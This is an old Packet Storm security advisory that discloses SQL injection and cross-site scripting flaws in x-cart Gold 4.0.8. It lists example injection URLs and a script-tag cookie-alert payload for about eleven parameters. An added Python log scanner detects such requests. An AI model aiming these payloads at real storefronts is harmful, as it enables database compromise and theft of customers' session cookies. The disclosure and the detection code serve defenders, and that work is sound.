xcartGold.txt

2005-08-14T00:00:00
ID PACKETSTORM:39364
Type packetstorm
Reporter svt.nukleon.us
Modified 2005-08-14T00:00:00

Description

                                        
  
SVadvisory#7  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Title: Multiple vulnerabilities in x-cart Gold   
Program: x-cart Gold
Vulnerable version: 4.0.8
Homepage: www.x-cart.com
Vulnerability found: 29.05.05
Found by: CENSORED / SVT / www.svt.nukleon.us
=====================================================================   
Description
  
SQL - injections   
---------------   
While researching the product, multiple SQL injection vulnerabilities
were found. The vulnerability affects practically all parameters.
The first flaw was found in the "cat" parameter. The script does not
check this parameter, and substituting a "'" character makes an
SQL injection possible. A further flaw was found in the "productid"
parameter: because special characters are not checked, passing a "'"
character to this parameter causes an SQL error, and the script
automatically redirects to a page reporting the error. On that page
the "id" parameter is visible; passing a "'" character to it likewise
makes an SQL injection possible. Next we look at the "mode" parameter:
substituting special characters produces an error, and an SQL injection
is possible. The same is found for the "section" parameter, in which
an SQL injection is also possible.
  
XSS   
---------------   
XSS vulnerabilities are possible in the same parameters as the
SQL injection flaws.
=====================================================================  
Example  
^^^^^^^^^  
SQL - injections  
---------------  
http://example/home.php?cat='[SQL-inj]  
http://example/home.php?printable='[SQL-inj]  
http://example/product.php?productid='[SQL-inj]  
http://example/product.php?mode='[SQL-inj]  
http://example/error_message.php?access_denied&id='[SQL-inj]  
http://example/help.php?section='[SQL-inj]  
http://example/orders.php?mode='[SQL-inj]  
http://example/register.php?mode='[SQL-inj]  
http://example/search.php?mode='[SQL-inj]  
http://example/giftcert.php?gcid='[SQL-inj]  
http://example/giftcert.php?gcindex='[SQL-inj]  
  
XSS  
---------------  
http://example/home.php?cat='><script>alert(document.cookie)</script>  
http://example/home.php?printable='><script>alert(document.cookie)</script>  
http://example/product.php?productid='><script>alert(document.cookie)</script>  
http://example/product.php?mode='><script>alert(document.cookie)</script>  
http://example/error_message.php?access_denied&id='><script>alert(document.cookie)</script>  
http://example/help.php?section='><script>alert(document.cookie)</script>  
http://example/orders.php?mode='><script>alert(document.cookie)</script>  
http://example/register.php?mode='><script>alert(document.cookie)</script>  
http://example/search.php?mode='><script>alert(document.cookie)</script>  
http://example/giftcert.php?gcid='><script>alert(document.cookie)</script>  
http://example/giftcert.php?gcindex='><script>alert(document.cookie)</script>  
=====================================================================  
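
For defenders reviewing web server logs, the following added example (not part of the original advisory) flags requests that put a quote character or a script tag into the script/parameter pairs listed above. The access-log format, the name scan_line and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script/parameter pairs taken from the advisory's example URLs.
AFFECTED = {
    "home.php": {"cat", "printable"}, "product.php": {"productid", "mode"},
    "error_message.php": {"id"}, "help.php": {"section"},
    "orders.php": {"mode"}, "register.php": {"mode"}, "search.php": {"mode"},
    "giftcert.php": {"gcid", "gcindex"},
}

# Request line of a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCRIPT_TAG_RE = re.compile(r"<\s*script", re.IGNORECASE)

def scan_line(line):
    """Return [(script, param, [classes])] for suspicious values in affected parameters."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    script = url.path.rsplit("/", 1)[-1]
    findings = []
    # parse_qsl percent-decodes, so %27 and %3Cscript%3E are caught too.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name not in AFFECTED.get(script, ()):
            continue  # parameter not named in the advisory for this script
        classes = []
        if "'" in value:
            classes.append("quote")
        if SCRIPT_TAG_RE.search(value):
            classes.append("script-tag")
        if classes:
            findings.append((script, name, classes))
    return findings

# Constructed sample log lines (not taken from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Aug/2005:10:00:01 +0000] "GET /home.php?cat=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [14/Aug/2005:10:00:07 +0000] "GET /product.php?productid=%27 HTTP/1.1" 302 0',
    '192.0.2.44 - - [14/Aug/2005:10:00:09 +0000] "GET /help.php?section=%27%3E%3CScRiPt%3Ex HTTP/1.1" 200 900',
    '192.0.2.51 - - [14/Aug/2005:10:01:00 +0000] "GET /search.php?q=o%27brien HTTP/1.1" 200 3000',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        for finding in scan_line(entry):
            print(finding)
```

Only the parameters named in the advisory are checked, so a quote in an unrelated parameter (the last sample line) is not reported.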
  
  
Conclusion
^^^^^^^^^^^
Research was carried out only on version 4.0.8. Other versions may
also be vulnerable. The vendor has been notified. If you have
any remarks, write to censored@mail.ru
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Search Vulnerabilities Team / www.svt.nukleon.us /  
CENSORED | Cash | Fredy | patr0n | Loader |  